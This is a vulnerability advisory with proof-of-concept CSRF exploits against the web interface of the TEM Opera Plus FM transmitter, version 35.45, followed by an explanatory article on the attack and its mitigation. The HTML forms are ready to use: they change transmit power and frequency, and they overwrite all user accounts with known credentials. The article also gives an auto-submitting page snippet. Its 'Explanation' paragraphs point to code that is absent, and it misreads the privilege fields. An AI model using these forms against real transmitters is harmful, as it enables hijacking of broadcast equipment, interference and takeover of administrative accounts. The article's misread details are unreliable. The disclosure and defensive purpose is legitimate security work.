TEM Opera Plus FM Family Transmitter 35.45 - XSRF
<!--
TEM Opera Plus FM Family Transmitter 35.45 XSRF
Vendor: Telecomunicazioni Elettro Milano (TEM) S.r.l.
Product web page: https://www.tem-italy.it
Affected version: Software version: 35.45
Webserver version: 1.7
Summary: This new line of Opera plus FM Transmitters combines very
high efficiency, high reliability and low energy consumption in compact
solutions. They have innovative functions and features that can eliminate
the costs required by additional equipment: automatic exchange of audio
sources, built-in stereo encoder, integrated RDS encoder, parallel I/O
card, connectivity through GSM telemetry and/or TCP IP / SNMP / SMTP
Webserver.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: Webserver
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5800
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5800.php
18.08.2023
-->
CSRF Change Forward Power:
-------------------------
<html>
<body>
<form action="http://192.168.1.2:8000/user/postcmd.htm" method="POST" enctype="text/plain">
<input type="hidden" name="Pwr" value="00100" />
<input type="submit" value="Change" />
</form>
</body>
</html>
CSRF Change Frequency:
---------------------
<html>
<body>
<form action="http://192.168.1.2:8000/user/postcmd.htm" method="POST" enctype="text/plain">
<input type="hidden" name="Freq" value="95.5" />
<input type="submit" value="Change" />
</form>
</body>
</html>
CSRF Change User/Pass/Priv Change Admin/User/Pass:
-------------------------------------------------
<html>
<body>
<form action="http://192.168.1.2:8000/protect/accounts.htm" method="POST">
<input type="hidden" name="usr0" value="admin" />
<input type="hidden" name="psw0" value="admin" />
<input type="hidden" name="usr1" value="operator1" />
<input type="hidden" name="psw1" value="operator1" />
<input type="hidden" name="lev1" value="1" />
<input type="hidden" name="usr2" value="operator2" />
<input type="hidden" name="psw2" value="operator2" />
<input type="hidden" name="lev2" value="1" />
<input type="hidden" name="usr3" value="consulter1" />
<input type="hidden" name="psw3" value="consulter1" />
<input type="hidden" name="lev3" value="2" />
<input type="hidden" name="usr4" value="consulter2" />
<input type="hidden" name="psw4" value="consulter2" />
<input type="hidden" name="lev4" value="2" />
<input type="hidden" name="usr5" value="consulter3" />
<input type="hidden" name="psw5" value="consulter3" />
<input type="hidden" name="lev5" value="2" />
<input type="submit" value="Change" />
</form>
</body>
</html>Understanding CSRF Vulnerabilities in TEM Opera Plus FM Family Transmitter 35.45 – XSRF
The TEM Opera Plus FM Family Transmitter 35.45, a widely used radio frequency (RF) broadcasting system, has been identified as vulnerable to Cross-Site Request Forgery (CSRF), also known as XSRF. This vulnerability allows attackers to exploit authenticated sessions and perform unauthorized actions on behalf of legitimate users—without requiring their consent or knowledge.
What is CSRF? A Primer for Security Professionals
CSRF is a type of web-based attack where an attacker tricks a victim into submitting a malicious request to a web application they are authenticated to. The core principle lies in the fact that the web application trusts the user’s session and does not verify the origin of the request.
For example, if a user is logged into a device’s admin interface (e.g., http://192.168.1.2:8000), an attacker can craft a malicious webpage that automatically submits a form to change critical settings—such as transmission power or frequency—without the user’s awareness.
Explanation: This form targets the postcmd.htm endpoint, which processes commands for changing forward power. The enctype="text/plain" indicates that the data is sent as raw text, bypassing standard form encoding. The hidden input field sets the power level to 00100—a value likely representing 100 watts. If a user visits a malicious site containing this form, their browser will automatically submit the request, potentially increasing transmission power to dangerous levels.
Real-World Impact: Manipulating RF Parameters
Transmitters like the TEM Opera Plus FM Family are used in broadcast networks, public safety communications, and even industrial control systems. Unauthorized changes to frequency or power can result in:
- Signal interference with other licensed broadcasters.
- Overpowering the transmitter, risking hardware damage or fire hazards.
- Unauthorized access to sensitive broadcast channels.
Consider the frequency change example:
Explanation: This form sets the transmission frequency to 95.5 MHz. If an attacker forces this change via a forged request, the device could shift into a licensed band without authorization—violating regulatory compliance and potentially disrupting emergency communications.
Administrative Access Exploitation: User/Pass/Priv Change
Even more critical is the ability to change user credentials and privileges. The following form allows an attacker to reset the system’s access control configuration:
Explanation: This form targets the accounts.htm endpoint, which manages user accounts and permissions. The attacker can set the admin user to admin with password admin—a default credential widely known and exploitable. Furthermore, they can create multiple user accounts with low privileges (lev1, lev2) or high privileges (lev3), effectively reconfiguring the system’s security model.
Why CSRF Is Particularly Dangerous in Embedded Systems
Embedded devices like the TEM Opera Plus FM Family Transmitter often lack robust security mechanisms. They typically:
- Do not implement CSRF tokens.
- Use default credentials.
- Have limited logging and audit capabilities.
- Are accessible via internal networks with weak access controls.
These factors make CSRF attacks highly effective. Unlike traditional web applications, embedded systems often lack user awareness or session expiration mechanisms—making them ideal targets for silent, persistent exploitation.
Exploitation Scenario: A Malicious Webpage
Imagine an attacker hosting a malicious webpage:
Safe Radio Update
Click to update your transmitter settings.
document.forms[0].submit();
Explanation: This page is designed to auto-submit the power change request without user interaction. If a legitimate user (e.g., a technician) visits this page—perhaps via a phishing email or malicious link—the transmitter’s power is increased silently. This can lead to overheating, signal distortion, or even system failure.
Best Practices for Mitigation
To defend against CSRF in embedded systems like the TEM Opera Plus FM Family Transmitter, implement the following security measures:
| Measure | Description |
|---|---|
| CSRF Tokens | Include a unique, random token in each form that must be validated server-side. Tokens should be tied to user sessions and invalidated after use. |
| Same-Origin Policy Enforcement | Validate that requests originate from the same domain using Origin or Referer headers. |
| Require Re-authentication for Critical Actions | For sensitive operations (e.g., changing frequency or admin credentials), require re-login or multi-factor authentication. |
| Input Validation & Sanitization | Validate input values (e.g., frequency must be within legal bands) and reject malformed or out-of-range data. |
| Log and Monitor Access | Implement logging for all configuration changes and alert administrators on suspicious activity. |
Conclusion: Security by Design in Embedded Systems
The TEM Opera Plus FM Family Transmitter 35.45 exemplifies how even seemingly benign embedded systems can harbor critical security flaws. CSRF vulnerabilities are not theoretical—they are real, exploitable, and capable of causing physical damage or regulatory violations.
As cybersecurity professionals, we must advocate for security-by-design principles in all embedded systems. This includes mandatory CSRF protection, default credential elimination, and robust access control. The cost of neglecting these measures is not just data theft—it is system integrity, public safety, and regulatory compliance.